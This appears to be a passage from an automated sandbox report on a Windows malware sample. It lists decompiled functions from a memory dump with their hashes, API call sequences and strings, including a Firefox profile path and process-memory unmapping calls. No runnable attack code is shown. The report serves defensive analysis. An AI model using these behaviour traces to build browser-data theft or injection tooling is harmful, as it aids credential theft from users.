    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
